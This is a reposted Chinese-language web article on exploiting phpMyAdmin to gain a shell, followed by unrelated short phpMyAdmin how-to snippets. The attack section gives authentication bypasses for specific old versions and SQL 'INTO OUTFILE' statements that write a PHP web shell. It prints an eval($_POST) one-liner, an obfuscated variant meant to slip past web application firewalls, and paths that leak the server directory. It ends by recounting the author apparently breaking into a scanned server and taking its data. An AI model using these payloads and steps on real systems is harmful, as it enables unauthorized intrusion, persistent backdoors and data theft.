分析PHPmyadmin漏洞以及拿shell的介紹-php我的管理者-PHP中文網

首頁

資料庫

php我的管理者

分析PHPmyadmin漏洞以及拿shell的介紹

藏色散人

Feb 10, 2021 pm 03:13 PM

phpmyadmin

下面由phpmyadmin教學欄位介紹關於PHPmyadmin漏洞和拿shell，希望對需要的朋友有幫助！

分析PHPmyadmin漏洞以及拿shell的介紹

phpmyadmin的漏洞相對來說，還是比較多的，對於新手來說，分享幾個漏洞，深入的處於程式碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼，直接使用'localhost'@'@」為帳號，密碼不用輸入。

phpmyadmin2.11.9.2 這個版本存在空口令。直接root使用者登陸，密碼不用

##找這個的話用自己的寫的腳本，或是搜素引擎什麼的，這裡懂的人就懂了，不懂也不在這裡。

#關於拿shell，----》root權限，並且有寫檔權限----》導出的目錄有寫權限----》有的情況下，就算你這兩個都有，但是伺服器的一些配置還是會對這個有影響。

在getshell之前先進入一個資料庫

第一種，使用sql語句，建立一個表，新增一個字段，字段的內容為一句話，然後匯出到php檔案中，最後刪除這個表，這個是最保險的方法 Create TABLE 表(列text NOT NULL)
Insert INTO 表(列) VALUES('')
select 列from 表into _utfile '路徑'
Drop TABLE IF EXISTS 表;

第二種方法，這個是直接寫入 select '一句話'INTO _UTFILE '路徑'
還有幾種方法，大致原理都一樣。
然後，一般的話，一句話都是

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>

有狗的話，用免殺一句話，下面這個是我過年前構造的過狗一句話，現在應該還可以過

<span style="font-size: 16px;"><?php<br/> $a = &#39;s&#39;;<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = &#39;a&#39;.$str[0].$str[1].&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;<br/> $exp($to[&#39;x&#39;])<br/> ?><br/></span>

找路徑的話，

<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错，下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>

3//再者就是利用網站包路徑，這些會的都會了，不會的慢慢的就會了。

下面開始實戰，腳本掃到一個IP，顯示存在phpmyadmin，開啟

##一看這些php檔案就是後門一句話，放到幾萬字典爆破，兩秒鐘

直接菜刀連結。。。。。

這個肯定被人搞了，直接打包好東西，你懂的。。。提權什麼的就不必要了。

以上是分析PHPmyadmin漏洞以及拿shell的介紹的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：csdn。如有侵權，請聯絡admin@php.cn刪除

PHPMYADMIN的目的：輕鬆管理MySQL數據庫Apr 12, 2025 am 12:14 AM

phpMyAdmin是一款基於Web的MySQL數據庫管理工具。 1.它支持基本的CRUD操作和高級功能，如數據庫設計和性能優化。 2.通過Web服務器運行，接受用戶輸入並轉換為MySQL命令。 3.基本用法包括創建數據庫，高級用法支持查詢優化。 4.常見錯誤如權限不足可以通過檢查用戶權限解決。 5.性能優化包括索引優化、查詢優化和數據庫設計。

MySQL和PhpMyAdmin的角色：詳細的故障Apr 11, 2025 am 12:14 AM

MySQL和phpMyAdmin的角色分別是存儲和管理數據、提供用戶友好的數據庫管理界面。 MySQL通過SQL進行數據操作，phpMyAdmin通過HTTP請求與MySQL交互，轉換用戶操作為SQL命令。

phpmyadmin連接數據庫Apr 10, 2025 pm 11:09 PM

通過 phpMyAdmin 連接數據庫的方法：訪問 phpMyAdmin 網站，使用憑據登錄。選擇要連接的數據庫。在“操作”選項卡下選擇“導出”選項。配置導出設置，選擇格式、表和數據范圍。保存導出的文件。在目標數據庫中選擇“導入”選項卡並瀏覽導出的文件。點擊“執行”按鈕，然後使用“查詢”選項卡驗證導入是否成功。

phpmyadmin怎麼連接oracleApr 10, 2025 pm 11:03 PM

通過以下步驟連接 phpMyAdmin 至 Oracle 數據庫：1. 安裝 Oracle 驅動程序；2. 創建數據庫連接，包括主機、用戶名、密碼、端口和類型；3. 保存設置以建立連接；4. 從 phpMyAdmin 中選擇連接的 Oracle 數據庫即可管理和使用它。

phpmyadmin建立數據表Apr 10, 2025 pm 11:00 PM

要使用 phpMyAdmin 創建數據表，以下步驟必不可少：連接到數據庫並單擊“新建”標籤。為表命名並選擇存儲引擎（推薦 InnoDB）。通過單擊“添加列”按鈕添加列詳細信息，包括列名、數據類型、是否允許空值以及其他屬性。選擇一個或多個列作為主鍵。單擊“保存”按鈕創建表和列。

phpmyadmin連接mysqlApr 10, 2025 pm 10:57 PM

如何使用 phpMyAdmin 連接到 MySQL？訪問 phpMyAdmin 的 URL，通常為 http://localhost/phpmyadmin 或 http://[您的服務器 IP 地址]/phpmyadmin。輸入您的 MySQL 用戶名和密碼。選擇您要連接的數據庫。點擊 "連接" 按鈕以建立連接。

phpmyadmin自動增長idApr 10, 2025 pm 10:54 PM

phpMyAdmin 中設置自動增長 ID 的步驟：打開 phpMyAdmin 並連接到數據庫。選擇要創建自動增長 ID 的表。在“結構”選項卡中，勾選“主鍵”部分的“自動增長”複選框。在“從”和“到”字段中輸入自動增長 ID 的起始值和結束值。單擊“保存”按鈕。設置自動增長 ID 的優勢包括：簡化數據插入。確保唯一性。優化性能。易於識別。需要注意的事項：確保自動增長 ID 範圍足夠大。重複值可能無法